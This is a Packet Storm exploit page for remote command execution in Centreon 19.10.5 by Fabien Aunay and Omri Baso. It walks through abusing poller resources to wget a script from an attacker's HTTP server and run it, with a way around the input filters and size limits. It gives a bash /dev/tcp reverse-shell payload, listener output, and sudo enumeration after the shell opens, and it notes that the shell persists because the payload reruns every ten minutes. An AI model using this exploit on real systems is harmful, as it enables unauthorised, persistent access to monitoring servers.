what you don't know can hurt you

Centreon 19.10.5 Remote Command Execution

Centreon 19.10.5 Remote Command Execution
Posted Jan 28, 2020
Authored by Fabien Aunay, Omri Baso

Centreon version 19.10.5 suffers from a remote command execution vulnerability.

tags | exploit, remote
MD5 | 720289cefc640adba74c7462a3b1fab7

Centreon 19.10.5 Remote Command Execution

Change Mirror Download
# Exploit Title: Centreon 19.10.5 - Remote Command Execution
# Date: 2020-01-27
# Exploit Author: Fabien AUNAY, Omri BASO
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -

###########################################################################################################
Centreon 19.10.5 Remote Command Execution Resources

Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Heath care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.

It is possible to call binaries not only in default $USER$ path by adding Poller's Resources.
By adding two entries it is possible to trigger a download exec reverse shell.
Note, your reverse shell is persistent because Centreon execute your payloads all 10 minutes by default.

Steps:
Objective 1 : Add Download Resource
Objective 2 : Add Exec Resource
Objective 3 : Create your both commands check
Objective 4 : Create your services and link them with a host

Restart the Central.

###########################################################################################################

# Objective 1 : Add Download Resource
- Configuration/Pollers/Resources

- Problem:
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
Illegal Macro Output Characters : `~$^&"|'<>
Maximum client side input size limit: 35

- Information:
Read Centreon documentation:
To install Centreon software from the repository, you should first install the centreon-release package,
which will provide the repository file. Some may not have the wget package installed.
If not perform the following : yum install wget

Solution 1: Remove restriction in Configuration/Pollers/Engine configuration
Solution 2: Modify input size inspector in client side <input> size="250"
Solution 3: Mixed, use a custom payload -> wget -P /tmp/ 127.0.0.1:8080/x.sh


# Objective 2 : Add Exec Resource
- Configuration/Pollers/Resources

- Problem:
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
Illegal Macro Output Characters : `~$^&"|'<>
Maximum client side input size limit: 35

Solution: Use a custom payload -> bash /tmp/x.sh


# Objective 3 : Create your both commands check with your resources $xxx$ without arguments
# Objective 4 : Create your services and link them with a host


POC:
Payload x.sh : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121

python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
127.0.0.1 - - [27/Jan/2020 22:13:27] "GET /x.sh HTTP/1.1" 200 -


nc -lvnp 1234
Ncat: Version 7.50
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:43128.
id
uid=993(centreon-engine) gid=990(centreon-engine) groups=990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
sudo -l
Matching Defaults entries for centreon-engine on centreon-lab:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty

User centreon-engine may run the following commands on centreon-lab:
(root) NOPASSWD: /sbin/service centreontrapd start
(root) NOPASSWD: /sbin/service centreontrapd stop
(root) NOPASSWD: /sbin/service centreontrapd restart
(root) NOPASSWD: /sbin/service centreontrapd reload
(root) NOPASSWD: /usr/sbin/service centreontrapd start
(root) NOPASSWD: /usr/sbin/service centreontrapd stop
(root) NOPASSWD: /usr/sbin/service centreontrapd restart
(root) NOPASSWD: /usr/sbin/service centreontrapd reload
(root) NOPASSWD: /sbin/service centengine start
(root) NOPASSWD: /sbin/service centengine stop
(root) NOPASSWD: /sbin/service centengine restart
(root) NOPASSWD: /sbin/service centengine reload
(root) NOPASSWD: /usr/sbin/service centengine start
(root) NOPASSWD: /usr/sbin/service centengine stop
(root) NOPASSWD: /usr/sbin/service centengine restart
(root) NOPASSWD: /usr/sbin/service centengine reload
(root) NOPASSWD: /bin/systemctl start centengine
(root) NOPASSWD: /bin/systemctl stop centengine
(root) NOPASSWD: /bin/systemctl restart centengine
(root) NOPASSWD: /bin/systemctl reload centengine
(root) NOPASSWD: /usr/bin/systemctl start centengine
(root) NOPASSWD: /usr/bin/systemctl stop centengine
(root) NOPASSWD: /usr/bin/systemctl restart centengine
(root) NOPASSWD: /usr/bin/systemctl reload centengine
(root) NOPASSWD: /sbin/service cbd start
(root) NOPASSWD: /sbin/service cbd stop
(root) NOPASSWD: /sbin/service cbd restart
(root) NOPASSWD: /sbin/service cbd reload
(root) NOPASSWD: /usr/sbin/service cbd start
(root) NOPASSWD: /usr/sbin/service cbd stop
(root) NOPASSWD: /usr/sbin/service cbd restart
(root) NOPASSWD: /usr/sbin/service cbd reload
(root) NOPASSWD: /bin/systemctl start cbd
(root) NOPASSWD: /bin/systemctl stop cbd
(root) NOPASSWD: /bin/systemctl restart cbd
(root) NOPASSWD: /bin/systemctl reload cbd
(root) NOPASSWD: /usr/bin/systemctl start cbd
(root) NOPASSWD: /usr/bin/systemctl stop cbd
(root) NOPASSWD: /usr/bin/systemctl restart cbd
(root) NOPASSWD: /usr/bin/systemctl reload cbd
Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    13 Files
  • 28
    May 28th
    18 Files
  • 29
    May 29th
    17 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close